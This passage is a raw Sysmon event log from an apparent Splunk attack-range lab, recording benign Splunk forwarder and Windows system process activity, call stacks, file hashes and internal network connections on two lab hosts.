10341000x8000000000000000150361Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.512{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70E4-60CA-160D-00000000D101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150360Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.512{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150359Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.512{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150358Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.512{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150357Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.512{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150356Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.512{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-70E4-60CA-160D-00000000D101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000150355Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.512{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70E4-60CA-160D-00000000D101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000150354Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.512{39BD8DE3-70E4-60CA-160D-00000000D101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000150353Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.127{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DE355BFB214A95FB593105A093E6794,SHA256=3C3C01DFC61B9F24B9AB91844C30399CE3AD17B195F7FD65604774FEC621A50E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150352Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.080{39BD8DE3-70E3-60CA-150D-00000000D101}28205308C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000150376Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.558{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B712F905C8A4E915C73B80DE3CE4FB31,SHA256=AC950496E9BD90FF3DF8C54FF9A51E500A5028FF366A2047312598AAF285C571,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150375Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.527{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37C655E703BFC76F40DF598F884BC072,SHA256=6E3C0C4036298BB4F0E828413AB1CFF8C2DAA1D35631B6095F683D3D0E40A2DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150374Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.496{39BD8DE3-70E5-60CA-170D-00000000D101}39565592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000150373Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.431{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58382-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 354300x8000000000000000150372Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:06.928{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58381-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000150371Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.185{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70E5-60CA-170D-00000000D101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150370Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.182{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150369Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.182{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150368Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.182{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150367Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.182{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150366Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.182{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-70E5-60CA-170D-00000000D101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000150365Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.181{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70E5-60CA-170D-00000000D101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000150364Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:09.181{39BD8DE3-70E5-60CA-170D-00000000D101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000104769Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:08.694{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55403-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104768Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:10.307{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B95BC43E41CE37A661FEF8D315FA3A53,SHA256=8516FEB51279068B3FB65BCBC3599C8B79A8CD7AD56B10AA9F4B162B4D62E651,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150377Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:10.573{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E4DB466BE3DB87A6DAD2C400AD47904,SHA256=025C68F7914FAC90067F0DF20156907761296D7D6FA51AFB4083DADDF980001F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104770Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:11.669{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EE1372320DB9BC9867F1FDBC15ED45F,SHA256=ECA927368DB239E558621FD9471E3AD13B2FFF8BE7CD13EBF143F1B820844CC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150386Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:11.588{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=092BBBA71CD3B20125BEC0CF06681268,SHA256=E288B9DD4CCD31BB71A2AF2371FC963CCE1D37FE28614EC1D62C11BB9640F9AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150385Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:11.242{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70E7-60CA-180D-00000000D101}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150384Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:11.242{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150383Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:11.242{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150382Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:11.242{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150381Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:11.242{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150380Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 